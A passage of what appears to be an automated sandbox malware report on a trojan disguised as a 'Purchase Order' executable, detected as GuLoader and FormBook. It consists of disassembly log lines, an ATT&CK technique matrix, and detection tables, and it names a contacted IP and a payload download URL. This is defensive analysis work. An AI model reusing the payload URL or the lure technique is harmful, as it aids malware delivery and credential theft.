      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348C11A4 mov eax, dword ptr fs:[00000030h]5_2_348C11A4
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348C11A4 mov eax, dword ptr fs:[00000030h]5_2_348C11A4
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3482B1B0 mov eax, dword ptr fs:[00000030h]5_2_3482B1B0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348E51CB mov eax, dword ptr fs:[00000030h]5_2_348E51CB
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348D61C3 mov eax, dword ptr fs:[00000030h]5_2_348D61C3
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348D61C3 mov eax, dword ptr fs:[00000030h]5_2_348D61C3
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484D1D0 mov eax, dword ptr fs:[00000030h]5_2_3484D1D0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484D1D0 mov ecx, dword ptr fs:[00000030h]5_2_3484D1D0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3488E1D0 mov eax, dword ptr fs:[00000030h]5_2_3488E1D0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3488E1D0 mov eax, dword ptr fs:[00000030h]5_2_3488E1D0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3488E1D0 mov ecx, dword ptr fs:[00000030h]5_2_3488E1D0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3488E1D0 mov eax, dword ptr fs:[00000030h]5_2_3488E1D0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3488E1D0 mov eax, dword ptr fs:[00000030h]5_2_3488E1D0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348E61E5 mov eax, dword ptr fs:[00000030h]5_2_348E61E5
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348351EF mov eax, dword ptr fs:[00000030h]5_2_348351EF
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348351EF mov eax, dword ptr fs:[00000030h]5_2_348351EF
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348351EF mov eax, dword ptr fs:[00000030h]5_2_348351EF
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348351EF mov eax, dword ptr fs:[00000030h]5_2_348351EF
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348351EF mov eax, dword ptr fs:[00000030h]5_2_348351EF
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348351EF mov eax, dword ptr fs:[00000030h]5_2_348351EF
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348351EF mov eax, dword ptr fs:[00000030h]5_2_348351EF
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348351EF mov eax, dword ptr fs:[00000030h]5_2_348351EF
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348351EF mov eax, dword ptr fs:[00000030h]5_2_348351EF
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348351EF mov eax, dword ptr fs:[00000030h]5_2_348351EF
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348351EF mov eax, dword ptr fs:[00000030h]5_2_348351EF
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348351EF mov eax, dword ptr fs:[00000030h]5_2_348351EF
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348351EF mov eax, dword ptr fs:[00000030h]5_2_348351EF
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348151ED mov eax, dword ptr fs:[00000030h]5_2_348151ED
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348B71F9 mov esi, dword ptr fs:[00000030h]5_2_348B71F9
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348BA118 mov ecx, dword ptr fs:[00000030h]5_2_348BA118
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348BA118 mov eax, dword ptr fs:[00000030h]5_2_348BA118
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348BA118 mov eax, dword ptr fs:[00000030h]5_2_348BA118
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348BA118 mov eax, dword ptr fs:[00000030h]5_2_348BA118
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348D0115 mov eax, dword ptr fs:[00000030h]5_2_348D0115
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34840124 mov eax, dword ptr fs:[00000030h]5_2_34840124
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34811131 mov eax, dword ptr fs:[00000030h]5_2_34811131
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34811131 mov eax, dword ptr fs:[00000030h]5_2_34811131
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480B136 mov eax, dword ptr fs:[00000030h]5_2_3480B136
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480B136 mov eax, dword ptr fs:[00000030h]5_2_3480B136
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480B136 mov eax, dword ptr fs:[00000030h]5_2_3480B136
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480B136 mov eax, dword ptr fs:[00000030h]5_2_3480B136
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34809148 mov eax, dword ptr fs:[00000030h]5_2_34809148
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34809148 mov eax, dword ptr fs:[00000030h]5_2_34809148
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34809148 mov eax, dword ptr fs:[00000030h]5_2_34809148
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34809148 mov eax, dword ptr fs:[00000030h]5_2_34809148
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348A8158 mov eax, dword ptr fs:[00000030h]5_2_348A8158
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34817152 mov eax, dword ptr fs:[00000030h]5_2_34817152
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34816154 mov eax, dword ptr fs:[00000030h]5_2_34816154
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34816154 mov eax, dword ptr fs:[00000030h]5_2_34816154
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480C156 mov eax, dword ptr fs:[00000030h]5_2_3480C156
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348E5152 mov eax, dword ptr fs:[00000030h]5_2_348E5152
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F172 mov eax, dword ptr fs:[00000030h]5_2_3480F172
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F172 mov eax, dword ptr fs:[00000030h]5_2_3480F172
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F172 mov eax, dword ptr fs:[00000030h]5_2_3480F172
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F172 mov eax, dword ptr fs:[00000030h]5_2_3480F172
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F172 mov eax, dword ptr fs:[00000030h]5_2_3480F172
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F172 mov eax, dword ptr fs:[00000030h]5_2_3480F172
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F172 mov eax, dword ptr fs:[00000030h]5_2_3480F172
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F172 mov eax, dword ptr fs:[00000030h]5_2_3480F172
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F172 mov eax, dword ptr fs:[00000030h]5_2_3480F172
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F172 mov eax, dword ptr fs:[00000030h]5_2_3480F172
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F172 mov eax, dword ptr fs:[00000030h]5_2_3480F172
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F172 mov eax, dword ptr fs:[00000030h]5_2_3480F172
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F172 mov eax, dword ptr fs:[00000030h]5_2_3480F172
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F172 mov eax, dword ptr fs:[00000030h]5_2_3480F172
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F172 mov eax, dword ptr fs:[00000030h]5_2_3480F172
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F172 mov eax, dword ptr fs:[00000030h]5_2_3480F172
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F172 mov eax, dword ptr fs:[00000030h]5_2_3480F172
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F172 mov eax, dword ptr fs:[00000030h]5_2_3480F172
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F172 mov eax, dword ptr fs:[00000030h]5_2_3480F172
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F172 mov eax, dword ptr fs:[00000030h]5_2_3480F172
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480F172 mov eax, dword ptr fs:[00000030h]5_2_3480F172
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348A9179 mov eax, dword ptr fs:[00000030h]5_2_348A9179
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484E284 mov eax, dword ptr fs:[00000030h]5_2_3484E284
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484E284 mov eax, dword ptr fs:[00000030h]5_2_3484E284
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34890283 mov eax, dword ptr fs:[00000030h]5_2_34890283
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34890283 mov eax, dword ptr fs:[00000030h]5_2_34890283
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_34890283 mov eax, dword ptr fs:[00000030h]5_2_34890283
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348E5283 mov eax, dword ptr fs:[00000030h]5_2_348E5283
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484329E mov eax, dword ptr fs:[00000030h]5_2_3484329E
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3484329E mov eax, dword ptr fs:[00000030h]5_2_3484329E
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348202A0 mov eax, dword ptr fs:[00000030h]5_2_348202A0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348202A0 mov eax, dword ptr fs:[00000030h]5_2_348202A0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348252A0 mov eax, dword ptr fs:[00000030h]5_2_348252A0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348252A0 mov eax, dword ptr fs:[00000030h]5_2_348252A0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348252A0 mov eax, dword ptr fs:[00000030h]5_2_348252A0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348252A0 mov eax, dword ptr fs:[00000030h]5_2_348252A0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348A62A0 mov eax, dword ptr fs:[00000030h]5_2_348A62A0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348A62A0 mov ecx, dword ptr fs:[00000030h]5_2_348A62A0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348A62A0 mov eax, dword ptr fs:[00000030h]5_2_348A62A0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348A62A0 mov eax, dword ptr fs:[00000030h]5_2_348A62A0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348A62A0 mov eax, dword ptr fs:[00000030h]5_2_348A62A0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348A62A0 mov eax, dword ptr fs:[00000030h]5_2_348A62A0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348A72A0 mov eax, dword ptr fs:[00000030h]5_2_348A72A0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348A72A0 mov eax, dword ptr fs:[00000030h]5_2_348A72A0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348D92A6 mov eax, dword ptr fs:[00000030h]5_2_348D92A6
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348D92A6 mov eax, dword ptr fs:[00000030h]5_2_348D92A6
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348D92A6 mov eax, dword ptr fs:[00000030h]5_2_348D92A6
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348D92A6 mov eax, dword ptr fs:[00000030h]5_2_348D92A6
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348992BC mov eax, dword ptr fs:[00000030h]5_2_348992BC
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348992BC mov eax, dword ptr fs:[00000030h]5_2_348992BC
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348992BC mov ecx, dword ptr fs:[00000030h]5_2_348992BC
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348992BC mov ecx, dword ptr fs:[00000030h]5_2_348992BC
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3481A2C3 mov eax, dword ptr fs:[00000030h]5_2_3481A2C3
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3481A2C3 mov eax, dword ptr fs:[00000030h]5_2_3481A2C3
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3481A2C3 mov eax, dword ptr fs:[00000030h]5_2_3481A2C3
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3481A2C3 mov eax, dword ptr fs:[00000030h]5_2_3481A2C3
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3481A2C3 mov eax, dword ptr fs:[00000030h]5_2_3481A2C3
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348192C5 mov eax, dword ptr fs:[00000030h]5_2_348192C5
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348192C5 mov eax, dword ptr fs:[00000030h]5_2_348192C5
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480B2D3 mov eax, dword ptr fs:[00000030h]5_2_3480B2D3
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480B2D3 mov eax, dword ptr fs:[00000030h]5_2_3480B2D3
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3480B2D3 mov eax, dword ptr fs:[00000030h]5_2_3480B2D3
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3483F2D0 mov eax, dword ptr fs:[00000030h]5_2_3483F2D0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_3483F2D0 mov eax, dword ptr fs:[00000030h]5_2_3483F2D0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348C12ED mov eax, dword ptr fs:[00000030h]5_2_348C12ED
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348C12ED mov eax, dword ptr fs:[00000030h]5_2_348C12ED
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348C12ED mov eax, dword ptr fs:[00000030h]5_2_348C12ED
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348C12ED mov eax, dword ptr fs:[00000030h]5_2_348C12ED
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348C12ED mov eax, dword ptr fs:[00000030h]5_2_348C12ED
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348C12ED mov eax, dword ptr fs:[00000030h]5_2_348C12ED
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348C12ED mov eax, dword ptr fs:[00000030h]5_2_348C12ED
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348C12ED mov eax, dword ptr fs:[00000030h]5_2_348C12ED
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348C12ED mov eax, dword ptr fs:[00000030h]5_2_348C12ED
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348C12ED mov eax, dword ptr fs:[00000030h]5_2_348C12ED
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348C12ED mov eax, dword ptr fs:[00000030h]5_2_348C12ED
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348C12ED mov eax, dword ptr fs:[00000030h]5_2_348C12ED
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348C12ED mov eax, dword ptr fs:[00000030h]5_2_348C12ED
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348C12ED mov eax, dword ptr fs:[00000030h]5_2_348C12ED
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_348202E1 mov eax, dword ptr fs:[00000030h]5_2_348202E1
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeProcess created: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe "C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe"Jump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 0_2_0040338F EntryPoint,LdrInitializeThunk,SetErrorMode,GetVersion,lstrlenA,LdrInitializeThunk,#17,OleInitialize,LdrInitializeThunk,SHGetFileInfoW,GetCommandLineW,CharNextW,LdrInitializeThunk,GetTempPathW,LdrInitializeThunk,GetTempPathW,GetWindowsDirectoryW,lstrcatW,LdrInitializeThunk,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,0_2_0040338F

      Stealing of Sensitive Information

      barindex
      Yara detected FormBook
      Source: Yara matchFile source: 00000005.00000002.2478615286.0000000034480000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

      Remote Access Functionality

      barindex
      Yara detected FormBook
      Source: Yara matchFile source: 00000005.00000002.2478615286.0000000034480000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Native API      		1
      Registry Run Keys / Startup Folder      		1
      Access Token Manipulation      		11
      Masquerading      		OS Credential Dumping211
      Security Software Discovery      		Remote Services1
      Archive Collected Data      		1
      Encrypted Channel      		Exfiltration Over Other Network Medium1
      System Shutdown/Reboot
      CredentialsDomainsDefault AccountsScheduled Task/Job1
      DLL Side-Loading      		11
      Process Injection      		1
      Virtualization/Sandbox Evasion      		LSASS Memory1
      Virtualization/Sandbox Evasion      		Remote Desktop Protocol1
      Clipboard Data      		1
      Ingress Tool Transfer      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
      Registry Run Keys / Startup Folder      		1
      Access Token Manipulation      		Security Account Manager3
      File and Directory Discovery      		SMB/Windows Admin SharesData from Network Shared Drive1
      Non-Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
      DLL Side-Loading      		11
      Process Injection      		NTDS23
      System Information Discovery      		Distributed Component Object ModelInput Capture11
      Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      Deobfuscate/Decode Files or Information      		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
      Obfuscated Files or Information      		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
      DLL Side-Loading      		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      Purchase Order Purchase Order Purchase Order Purchase Order.exe27%ReversingLabsWin32.Trojan.Guloader

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\nsh5948.tmp\System.dll3%ReversingLabs

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://185.222.57.90/zFSrvbrRquo53.bin0%Avira URL Cloudsafe
      http://185.222.57.90/zFSrvbrRquo53.binlb0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      No contacted domains info

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://185.222.57.90/zFSrvbrRquo53.binfalse
      • Avira URL Cloud: safe
      		unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtdPurchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000001.1989166062.00000000005F2000.00000020.00000001.01000000.00000006.sdmpfalse
        		high
        http://www.ftp.ftp://ftp.gopher.Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000001.1989166062.0000000000649000.00000020.00000001.01000000.00000006.sdmpfalse
          		high
          http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtdPurchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000001.1989166062.00000000005F2000.00000020.00000001.01000000.00000006.sdmpfalse
            		high
            http://nsis.sf.net/NSIS_ErrorErrorPurchase Order Purchase Order Purchase Order Purchase Order.exefalse
              		high
              http://185.222.57.90/zFSrvbrRquo53.binlbPurchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000002.2450313980.00000000047B8000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214Purchase Order Purchase Order Purchase Order Purchase Order.exe, 00000005.00000001.1989166062.0000000000649000.00000020.00000001.01000000.00000006.sdmpfalse
                		high

                World Map of Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public IPs

                IPDomainCountryFlagASNASN NameMalicious
                185.222.57.90
                		unknownNetherlands
                		51447ROOTLAYERNETNLfalse

                General Information

                Joe Sandbox version:41.0.0 Charoite
                Analysis ID:1557894
                Start date and time:2024-11-18 18:09:09 +01:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 7m 26s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:8
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:Purchase Order Purchase Order Purchase Order Purchase Order.exe
                Detection:MAL
                Classification:mal80.troj.evad.winEXE@3/8@0/1
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 90%
